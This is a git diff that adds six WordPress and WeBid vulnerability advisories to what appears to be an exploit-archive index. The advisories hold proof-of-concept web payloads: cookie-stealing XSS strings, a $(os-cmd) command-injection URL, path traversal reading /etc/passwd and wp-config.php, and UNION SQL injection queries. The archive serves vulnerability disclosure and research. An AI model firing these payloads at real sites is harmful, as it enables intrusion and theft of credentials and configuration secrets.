diff --git a/files.csv b/files.csv
index b5095e169..d835a1e5a 100755
--- a/files.csv
+++ b/files.csv
@@ -33712,6 +33712,7 @@ id,file,description,date,author,platform,type,port
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
+39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
@@ -35494,3 +35495,8 @@ id,file,description,date,author,platform,type,port
39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
+39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin Cross Site Scripting and Command Injection Vulnerabilities",2014-07-13,MustLive,php,webapps,0
+39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Include Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
diff --git a/platforms/php/webapps/39249.txt b/platforms/php/webapps/39249.txt
new file mode 100755
index 000000000..c47fa70ea
--- /dev/null
+++ b/platforms/php/webapps/39249.txt
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/68519/info
+
+WeBid is prone to multiple cross-site-scripting vulnerabilities and an LDAP injection vulnerability.
+
+An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+WeBid 1.1.1 is vulnerable; other versions may also be affected.
+
+1. http://www.example.com/WeBid/register.php
+
+Reflected Cross-Site Scripting in the parameters are :
+ "TPL_name="
+ "TPL_nick="
+ "TPL_email"
+ "TPL_year"
+ "TPL_address"
+ "TPL_city"
+ "TPL_prov"
+ "TPL_zip"
+ "TPL_phone"
+ "TPL_pp_email"
+ "TPL_authnet_id"
+ "TPL_authnet_pass"
+ "TPL_wordpay_id"
+ "TPL_toocheckout_id"
+ "TPL_moneybookers_email"
+
+PoC :
+we can run our xss script with all these different parameters
+
+Host=www.example.com
+User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language=en-US,en;q=0.5
+Accept-Encoding=gzip, deflate
+Referer=http://www.example.com/web-id/register.php
+Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
+Connection=keep-alive
+Content-Type=application/x-www-form-urlencoded
+Content-Length=417
+POSTDATA=csrftoken=&TPL_name=">&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
+----------------------------------------------------------------------------------------------------------------
+2. http://www.example.com/WeBid/user_login.php
+
+Reflected Cross-Site Scripting in the parameter is :
+ "username"
+
+Host=www.example.com
+User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language=en-US,en;q=0.5
+Accept-Encoding=gzip, deflate
+Referer=http://www.example.com/web-id/user_login.php
+Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
+Connection=keep-alive
+Content-Type=application/x-www-form-urlencoded
+Content-Length=96
+POSTDATA=username=">&password=&input=Login&action=login
+==================================================================================================================
+2. LDAP Injection
+
+PoC :
+http://www.example.com/WeBid/loader.php?js=[LDAP]
+http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;
+
+PoC
+http://www.example.com/WeBid/viewhelp.php?cat=[LDAP]
+Replace cat= as 1,2,3,4
diff --git a/platforms/php/webapps/39250.txt b/platforms/php/webapps/39250.txt
new file mode 100755
index 000000000..a00705321
--- /dev/null
+++ b/platforms/php/webapps/39250.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/68525/info
+
+WordPress DZS-VideoGallery plugin is prone to multiple cross site scripting vulnerabilities and a command-injection vulnerability.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to execute arbitrary OS commands. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DZS-VideoGallery 7.85 is vulnerable; prior versions are also affected.
+
+Cross-site-scripting:
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+Command-Injection:
+
+http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd)
\ No newline at end of file
diff --git a/platforms/php/webapps/39251.txt b/platforms/php/webapps/39251.txt
new file mode 100755
index 000000000..6ad2684d9
--- /dev/null
+++ b/platforms/php/webapps/39251.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/68556/info
+
+BookX plugin for WordPress is prone to a local file-include vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information; other attacks are also possible.
+
+BookX plugin 1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../../../../../etc/passwd
+
+http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/39252.txt b/platforms/php/webapps/39252.txt
new file mode 100755
index 000000000..bfaf7f3c9
--- /dev/null
+++ b/platforms/php/webapps/39252.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68557/info
+
+WP Rss Poster plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18
\ No newline at end of file
diff --git a/platforms/php/webapps/39253.txt b/platforms/php/webapps/39253.txt
new file mode 100755
index 000000000..b0384df3f
--- /dev/null
+++ b/platforms/php/webapps/39253.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68558/info
+
+ENL Newsletter plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ENL Newsletter 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1
\ No newline at end of file
diff --git a/platforms/php/webapps/39254.html b/platforms/php/webapps/39254.html
new file mode 100755
index 000000000..29ba82202
--- /dev/null
+++ b/platforms/php/webapps/39254.html
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/68656/info
+
+The CopySafe PDF Protection plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+CopySafe PDF Protection 0.6 and prior are vulnerable.
+
+